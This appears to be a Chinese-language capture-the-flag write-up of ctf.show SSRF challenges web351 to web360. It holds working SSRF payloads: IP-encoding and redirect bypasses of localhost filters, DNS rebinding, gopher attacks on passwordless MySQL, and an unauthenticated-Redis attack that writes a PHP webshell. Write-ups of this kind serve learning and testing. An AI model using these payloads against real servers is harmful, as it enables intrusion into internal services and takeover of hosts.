SSRF
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,攻击者通过该漏洞可以发起针对服务器内部的请求。攻击者可以利用 SSRF 攻击从服务器发起的请求来访问服务器上的敏感信息、执行任意代码或攻击内部系统。SSRF 漏洞通常出现在服务器端代码中,例如 Web 应用程序或 API 中的网络请求功能,如果不正确验证用户输入的 URL,就可能导致 SSRF 漏洞的产生。要防止 SSRF 漏洞,开发人员应该正确验证和限制用户输入的 URL,确保只能访问预期的资源。
从SSRF的总结这里摘了一点笔记:
相关函数和类
- file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中
- readfile():输出一个文件的内容
- fsockopen():打开一个网络连接或者一个Unix 套接字连接
- curl_exec():初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl_close() 函数使用
- fopen():打开一个文件文件或者 URL
- PHP原生类SoapClient在触发反序列化时可导致SSRF
相关协议
- file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容
- dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等
- gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell
- http/s协议:探测内网主机存活
利用方式
1.让服务端去访问相应的网址
2.让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms
3.可以使用file、dict、gopher、ftp协议进行请求访问相应的文件
4.攻击内网web应用(可以向内部任意主机的任意端口发送精心构造的数据包{payload})
5.攻击内网应用程序(利用跨协议通信技术)
6.判断内网主机是否存活:方法是访问看是否有端口开放
7.DoS攻击(请求大文件,始终保持连接keep-alive always)
web351
1 | error_reporting(0); |
访问flag.php
,显示非本地用户无法访问,SSRF伪造请求即可。
payload:
1 | POST url=http://127.0.0.1/flag.php |
web352
1 | error_reporting(0); |
代码里有过滤但是没有用。但是只让用http或者https协议了。
1 | POST url=http://localhost/flag.php |
web353 - 绕过简单的本地域名限制
1 | error_reporting(0); |
加强了防御措施。但是
1 | POST url=http://www.sudo.cc/flag.php # 可以用www.sudo.cc的域名表示本机。 |
还是可以绕过。从wp这里学了几手其他的方法
绕过本地域名限制的方案
ip地址进制转换
1
2
3
4
5127.0.0.1
十进制整数:url=http://2130706433/flag.php
十六进制:url=http://0x7F.0.0.1/flag.php
八进制:url=http://0177.0.0.1/flag.php
十六进制整数:url=http://0x7F000001/flag.php缺省模式(IPv4/v6的缺省表示)
1
2127.0.0.1写成127.1
http://0/flag.php (0.0.0.0)在windows中,0代表0.0.0.0,而在linux下,0代表127.0.0.1
CIDR
1
url=http://127.127.127.127/flag.php
使用短链接跳转
1
url=http://www.sudo.cc/flag.php
网络上存在一个名为sudo.cc的服务,放访问这个服务时,会自动重定向到127.0.0.1。(302跳转)
当然,也可以用短链接托管服务生成一个重定向到127.0.0.1的域名。
web354 - header重定向/DNS重绑定
1 | error_reporting(0); |
上面的很多绕过手段都还能用。但这道题准备跟着wp用DNS重绑定来做。
然而域名到期了,ceye也上不去,索性直接用服务器弄header重定向了。
1 | # redirect.php |
然后php -S 0.0.0.0 vps_port
最后url=http://vps_ip:vps_port/redirect.php
然而我的vps地址里有1和0,令人感叹。只能用www.sudo.cc绕过了。
DNS重绑定
对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就pass掉。
但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,我们可以进行DNS 重绑> 定攻击。我们利用DNS Rebinding技术,在第一次校验IP的时候返回一个合法的IP,在真实发起请求的时候,返回我们真正想要访问的内网IP即> 可。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。这样就可以进行攻击了,完整的攻击流程为:
服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP
对于获得的IP进行判断,发现为非黑名单IP,则通过验证
服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务器返回的是内网地址。
web355 - 限制域名长度 - 5位
1 | error_reporting(0); |
127.0.0.1写成127.1。
web356 - 限制域名长度 - 3位
1 | error_reporting(0); |
- 缺省模式(IPv4/v6的缺省表示)
1
2127.0.0.1写成127.1
http://0/flag.php (0.0.0.0)在windows中,0代表0.0.0.0,而在linux下,0代表127.0.0.1
web357 - header重定向/DNS重绑定
1 | error_reporting(0); |
gethostbyname
函数返回ipv4地址
1 | gethostbyname(string $hostname): string |
filter_var
使用特定的过滤器过滤一个变量
1 | filter_var(mixed $value, int $filter = FILTER_DEFAULT, array|int $options = 0): mixed |
FILTER_VALIDATE_IP 是一个过滤器常量,用于验证 IP 地址的有效性。
FILTER_FLAG_NO_PRIV_RANGE 是一个过滤器标志,用于指示在验证 IP 地址时排除私有地址范围(例如,10.0.0.0/8、172.16.0.0/12、192.168.0.0/16)。
FILTER_FLAG_NO_RES_RANGE 是一个过滤器标志,用于指示在验证 IP 地址时排除保留地址范围(例如,0.0.0.0/8、127.0.0.0/8、224.0.0.0/4)。
因此,这段代码的作用是检查 $ip 变量是否是一个合法的公共 IP 地址,如果不是,则输出 ‘ip!’ 并终止脚本的执行。
那直接vps用之前web354的方法就行。或者用DNS重绑定
1 | # redirect.php |
然后php -S 0.0.0.0 vps_port
最后url=http://vps_ip:vps_port/redirect.php
web358 - URL的截断:@、#以及?
1 | error_reporting(0); |
1 | POST url=http://ctf.@127.0.0.1/flag.php#show |
@、#和?在URL中的用法
@:在 URL 中,@ 符号通常用于指定用户名和密码,格式为 username:password@hostname。例如,http://username:password@example.com 中的 username:password 部分表示用户名和密码,用于进行基本身份验证(Basic Authentication)。
#:在 URL 中,# 符号用于指示片段标识符(fragment identifier),也称为锚点(anchor)。片段标识符位于 URL 的末尾,用于标识页面中的特定部分。当用户访问包含片段标识符的 URL 时,浏览器会自动滚动到指定的锚点位置。
?:在 URL 中,? 符号用于分隔 URL 的路径部分和查询字符串部分。查询字符串通常用于向服务器传递参数,参数之间使用 & 符号分隔,格式为 key1=value1&key2=value2&…。例如,http://example.com/search?q=query 中的 ?q=query 部分表示查询字符串,其中 q 是参数名,query 是参数值。
平常我们传入的url是url=http://127.0.0.1
,如果我们传入的url是url=http://aaaa@127.0.0.1
,它此时依旧会访问127.0.0.1
#
和?
同理。所以这道题可以前向用@
截断,后向用#
或?
截断。
web359 - 打无密码SQL
一个登录界面。抓个包发现存在参数 returl
1 | u=123&returl=https%3A%2F%2F404.chall.ctf.show%2F |
结合提示,应该是用gopher打无密码Mysql
1 | Give MySQL username: root |
然后,注意需要再进行一次URL编码。
将 _ 下划线后面的内容再进行一次 url 编码(防止出现特殊字符,后端 curl 接收到参数后会默认解码一次)
最后POST命令过去就可以了。
1 | /2.php |
web360 - 打Redis
1 | error_reporting(0); |
Redis 未授权访问
Redis 默认情况下,会绑定在 0.0.0.0:6379
,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空),会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的 config
命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh
文件夹的 authotrized_keys
文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器
简单说,漏洞的产生条件有以下两点:
- redis 绑定在
0.0.0.0:6379
,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网 - 没有设置密码认证(一般为空),可以免密码远程登录redis服务
使用url=dict://0.0.0.0:6379
测试目标服务器,返回了如下内容,证明其存在redis服务:
1 | ?> -ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP +OK |
1 | What do you want?? (ReverseShell/PHPShell): PHPShell |
别忘了两次URL编码,然后直接传上去就能访问/shell.php
了。